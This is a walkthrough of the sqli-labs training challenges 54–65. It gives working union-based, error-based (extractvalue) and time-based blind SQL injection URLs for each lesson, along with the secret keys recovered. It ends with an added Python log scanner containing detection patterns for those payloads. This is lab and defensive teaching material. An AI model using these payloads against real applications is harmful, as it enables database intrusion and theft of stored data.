Sqli-labs Challenges(54-65)

Less-54:Challenge-1

The page hint tells us that the key (generated on the fly) must be obtained within 10 queries; after 10 queries the key is reset, so the queries have to be used efficiently.
The database name is known to be challenges; query the table name:

http://localhost/sqli-labs-master/Less-54/?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20


This gives the table name bj2h4jizgy; now query the columns:

http://localhost/sqli-labs-master/Less-54/?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='bj2h4jizgy'--%20


Query all the data to get the key: uO2jP4KOXg2plHOs2U5srONh, then submit it.

http://localhost/sqli-labs-master/Less-54/?id=1' and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_65KL,0x20,tryy),3 from bj2h4jizgy--%20

Less-55:Challenge-2

Same as Less-54, except the closing is now the ) form.
Query the tables: hyj1gftjil

http://localhost/sqli-labs-master/Less-55/?id=1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20

Query the columns: id,sessid,secret_DHWC,tryy

http://localhost/sqli-labs-master/Less-55/?id=1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='hyj1gftjil'--%20

Query all the data to get the key: 2LEqYSvDkIbf5xU3Z1IidbET

http://localhost/sqli-labs-master/Less-55/?id=1) and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_DHWC,0x20,tryy),3 from hyj1gftjil--%20

Less-56:Challenge-3

No different from the above; the closing is now ')
Straight to the payloads:

http://localhost/sqli-labs-master/Less-56/?id=1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20
http://localhost/sqli-labs-master/Less-56/?id=1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='v4v66ezujp'--%20
http://localhost/sqli-labs-master/Less-56/?id=1') and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_Z71A,0x20,tryy),3 from v4v66ezujp--%20

key:cA8iROAUCkbAEgYyNBbeyiqP

Less-57:Challenge-4

Same as above; the closing is now the double-quote type.
Payloads:

http://localhost/sqli-labs-master/Less-57/?id=1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--%20
http://localhost/sqli-labs-master/Less-57/?id=1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='CHALLENGES' and table_name='yipmb5gy9w'--%20
http://localhost/sqli-labs-master/Less-57/?id=1" and 1=2 union select 1,group_concat(id,0x20,sessid,0x20,secret_2Q8T,0x20,tryy),3 from yipmb5gy9w--%20

key:ei5Q8SV1dgN5rk9j2UnXtFma

Less-58:Challenge-5

From the source code you can see that the page does not echo the data returned by the database query at all.

So the data has to be surfaced through an error message instead: error-based injection (here via extractvalue()).
Dump the table name: cnpbo82z2k

http://localhost/sqli-labs-master/Less-58/?id=-1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

Dump the column names: id,sessid,secret_Y7U3,tryy

http://localhost/sqli-labs-master/Less-58/?id=-1' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='cnpbo82z2k'),0x7e))--%20

Get the key: M4li6XN5AhP68HDC7VeLh522

http://localhost/sqli-labs-master/Less-58/?id=-1' or extractvalue(1,concat(0x7e,(select secret_Y7U3 from cnpbo82z2k),0x7e))--%20

Less-59:Challenge-6

Same method, except there is no single-quote closing.
Dump the table name: kqp5l7l9qz

http://localhost/sqli-labs-master/Less-59/?id=-1 or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

Dump the column names: id,sessid,secret_I6NF,tryy

http://localhost/sqli-labs-master/Less-59/?id=-1 or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kqp5l7l9qz'),0x7e))--%20

Get the key: lqTDY68yGvkPqv2rmADA0G0h

http://localhost/sqli-labs-master/Less-59/?id=-1 or extractvalue(1,concat(0x7e,(select secret_I6NF from kqp5l7l9qz),0x7e))--%20

Less-60:Challenge-7

Same method; the closing is now ")
Dump the table name: nv3kb3qx97

http://localhost/sqli-labs-master/Less-60/?id=-1") or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

Dump the column names: id,sessid,secret_8L1X,tryy

http://localhost/sqli-labs-master/Less-60/?id=-1") or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='nv3kb3qx97'),0x7e))--%20

Get the key: pveMb7vSlXoJA8we9ONgYHj9

http://localhost/sqli-labs-master/Less-60/?id=-1") or extractvalue(1,concat(0x7e,(select secret_8L1X from nv3kb3qx97),0x7e))--%20

Less-61:Challenge-8

Same method; the closing is now '))
Dump the table name: 32dvo9vo5m

http://localhost/sqli-labs-master/Less-61/?id=-1')) or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--%20

Dump the column names: id,sessid,secret_1HY8,tryy

http://localhost/sqli-labs-master/Less-61/?id=-1')) or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='32dvo9vo5m'),0x7e))--%20

Get the key: x4wbcyp16vSy8GJYvrMMC23T

http://localhost/sqli-labs-master/Less-61/?id=-1')) or extractvalue(1,concat(0x7e,(select secret_1HY8 from 32dvo9vo5m),0x7e))--%20

Less-62:Challenge-9

Same method, with the closing now '), but error-based injection no longer works here, so time-based injection is used.
Blind-inject the table name one character at a time (the payload below tests whether position 1 is 'x', ASCII 120, and delays only when the guess is wrong): xy9z8y4idj

http://localhost/sqli-labs-master/Less-62/?id=1') and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=120,0,sleep(5))--%20

Blind-inject the column (position 11 is the first character after "id,sessid,", tested against 's', ASCII 115): secret_8UHY

http://localhost/sqli-labs-master/Less-62/?id=1') and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='xy9z8y4idj'),11,1))=115,0,sleep(5))--%20

Blind-inject the key: Fo0om6HYYZmlvhagiSJ1GI2z

http://localhost/sqli-labs-master/Less-62/?id=1') and if(ascii(substr((select secret_8UHY from xy9z8y4idj),1,1))=70,0,sleep(5))--%20

Less-63:Challenge-10

Same as Less-62; the closing is now '
Blind-inject the table name: oaa2n3tgkl

http://localhost/sqli-labs-master/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=111,0,sleep(5))--%20

Blind-inject the column: secret_7063

http://localhost/sqli-labs-master/Less-63/?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='oaa2n3tgkl'),11,1))=115,0,sleep(5))--%20

Blind-inject the key: phYMsMewhxZaH62c4sGu2rzl

http://localhost/sqli-labs-master/Less-63/?id=1' and if(ascii(substr((select secret_7063 from oaa2n3tgkl),1,1))=112,0,sleep(5))--%20

Less-64:Challenge-11

Same as Less-62; the closing is now ))
Blind-inject the table name: z7uakidqjr

http://localhost/sqli-labs-master/Less-64/?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=122,0,sleep(5))--%20

Blind-inject the column: secret_FW2T

http://localhost/sqli-labs-master/Less-64/?id=1)) and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='z7uakidqjr'),11,1))=115,0,sleep(5))--%20

Blind-inject the key: rDmvO277qpheigiMxCua2UUB

http://localhost/sqli-labs-master/Less-64/?id=1)) and if(ascii(substr((select secret_FW2T from z7uakidqjr),1,1))=114,0,sleep(5))--%20

Less-65:Challenge-12

Same as Less-62; the closing is now ")
Blind-inject the table name: 48nvbr2bme

http://localhost/sqli-labs-master/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52,0,sleep(5))--%20

Blind-inject the column: secret_2VSI

http://localhost/sqli-labs-master/Less-65/?id=1") and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='48nvbr2bme'),11,1))=115,0,sleep(5))--%20

Blind-inject the key: zVwn12yqWR2ORKplHmZozOzt

http://localhost/sqli-labs-master/Less-65/?id=1") and if(ascii(substr((select secret_2VSI from 48nvbr2bme),1,1))=122,0,sleep(5))--%20
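Added example, not part of the original walkthrough or of sqli-labs: a small Python scanner, written from the defender's side, that picks the three payload families used above (union select, extractvalue() error-based, sleep() time-based) out of web-server access logs by URL-decoding the id parameter the same way the backend does. The log format, host and timestamps are constructed assumptions modelled on the Less-54, Less-58 and Less-62 requests.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original post), modelled on the
# Less-54 (union), Less-58 (error-based) and Less-62 (time-based) requests above,
# plus one benign request. %20 is how the walkthrough writes the spaces.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs-master/Less-54/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs-master/Less-54/?id=1'%20and%201=2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema='CHALLENGES'--%20 HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs-master/Less-58/?id=-1'%20or%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='challenges'),0x7e))--%20 HTTP/1.1" 200 700
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs-master/Less-62/?id=1')%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='challenges'),1,1))=120,0,sleep(5))--%20 HTTP/1.1" 200 512
"""

# Each rule is matched against the URL-decoded, lower-cased parameter value.
RULES = {
    "union-based":  re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "error-based":  re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "time-based":   re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "schema-enum":  re.compile(r"\binformation_schema\s*\."),
    "comment-tail": re.compile(r"(?:--\s|#|/\*)"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify(value):
    """Return the rule names that fire on one decoded parameter value."""
    v = value.lower()
    return [name for name, rx in RULES.items() if rx.search(v)]

def scan_log(text):
    """Return a list of (path, param, value, techniques) for every parameter that
    looks injected. parse_qsl does the percent-decoding, so %20 and '--%20' are
    seen as the database saw them; id is also flagged when it is not a bare integer."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            techniques = classify(value)
            if name == "id" and not re.fullmatch(r"-?\d+", value.strip()):
                techniques.append("non-numeric-id")
            if techniques:
                hits.append((parts.path, name, value, techniques))
    return hits
```

The "non-numeric-id" rule is the cheapest signal here: every payload on this page, whatever its closing form, has to put something other than a bare integer into id.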